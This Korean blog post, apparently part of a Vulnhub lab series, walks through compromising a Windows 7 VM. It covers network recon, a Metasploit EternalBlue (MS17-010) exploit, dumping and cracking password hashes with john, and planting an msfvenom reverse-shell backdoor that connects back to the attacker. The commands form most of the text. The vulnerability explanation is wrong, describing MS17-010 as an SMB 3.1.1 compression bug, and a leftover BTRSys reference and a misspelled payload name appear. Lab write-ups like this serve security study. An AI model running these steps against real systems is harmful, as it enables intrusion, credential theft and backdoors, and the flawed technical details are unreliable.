■ Win7 환경 실습
□ 실습 환경
- VMware로 구성
- Kali Linux[설치 경로 : https://www.kali.org/get-kali/#kali-virtual-machines]
- Win7 실습환경
□ 진행 절차
Step 1. CTF- Win7 환경 VMware에서 부팅 시, login 페이지가 뜨나 계정 정보를 알고 있지 않음
- 해당 서버에 취약점을 이용하여 계정 정보를 몰라도 권한 탈취가 목표
Step 2. 해당 서버 IP정보를 획득하기 위하여 Kali Linux를 활성화 후, 같은 네트워크 IP 대역 정보를 획득
- Kali Linux와 BTRSys를 VMware에서 NAT로 같은 네트워크로 설정 필요
- VMware에서는 x.x.x.[1,2,254]는 예약된 IP로 해당 IP 이외에 탐지된 IP 확인 필요
명령어 |
root@kali#arp-scan –I eth0 -l |
Step 3. 해당 서버 Open된 포트 및 설정 정보들을 확인하기 위하여 NMAP을 사용하여 정보 수집
- Open된 포트 : SMB(135/TCP, 139/TCP, 445/TCP), MSPRC(49152/TCP etc)
- NMAP을 통해 발견한 사실 : ⓵ SMB로 사용자 이름(JON-PC) 정보를 획득 ⓶ Windows 7 Professional 7601 버전인 것으로 확인 ⓷ SMB guest 계정도 활성화 되어 있는 것으로 확인 ⓸ SMB 취약점(MS17-010)이 있는 것으로 확인
※ MS17-010 취약점(CVE-2017-0143): OS가 SMB 3.1.1 프로토콜의 압축패킷을 처리하는 과정에서 오류가 발생하여 야기되는 취약점으로, 공격자는 조작된 패킷을 악용하여 원격에서 인증을 거치지 않은 상태로 원격코드 실행이 가능한 취약점
명령어 |
root@kali#nmap –sV —script=vuln [점검할 IP] |
Step 4. 발견한 취약점을 활용하기 위해 metasploit을 사용하여 exploit을 진행한 결과, 정상적으로 권한 획득 확인
명령어 |
root@kali#metasploit |
msf6 >search ms17-010 |
msf6 >use 0 |
msf6 exploit(windows/smb/ms17_010_eternalblue)>show options |
msf6 exploit(windows/smb/ms17_010_eternalblue)>set RHOSTS [점검할 IP] |
msf6 exploit(windows/smb/ms17_010_eternalblue)>exploit |
Step 5. 사용자 계정 정보를 탈취하기 위하여 hashdump 명령어를 사용하여 비밀번호를 획득 후, 패스워드 크랙 도구인 john을 사용하여 크랙 시도 시, 패스워드 탈취 성공 및 정상 로그인 확인
명령어 |
meterpreter>hashdump |
root@kali#mousepad crack |
root@kali:john —format=nt —wordlist=/usr/share/wordlists/rockyou.txt crack |
Step 6. meterpreter를 사용하면 세션이 끊어질 가능성이 있어, backdoor 설치를 위하여 msfvenom을 사용하여 reverse shell 생성 후 업로드 시, 정상적으로 백도어 동작 확인
명령어 |
root@kali#msfvenom –p windows/x64/shell_revesre_tcp LHOST=[Kali IP] LPORT=[open한 포트] -f exe –o a.exe |
meterpreter>cd / |
meterpreter> mkdir tmp |
meterpreter> cd tmp |
meterpreter> upload a.exe |
'vulnhub' 카테고리의 다른 글
Vulnhub [Moriarty Corp] (1) | 2023.10.17 |
---|---|
vulnhub[hackable3 환경 실습] (0) | 2023.08.16 |
Vulnhub[holynix] (0) | 2023.08.16 |
Vulnhub[Kioptix Level1] (0) | 2023.08.16 |
Vulnhub[BTRsys 환경 실습] (0) | 2023.08.14 |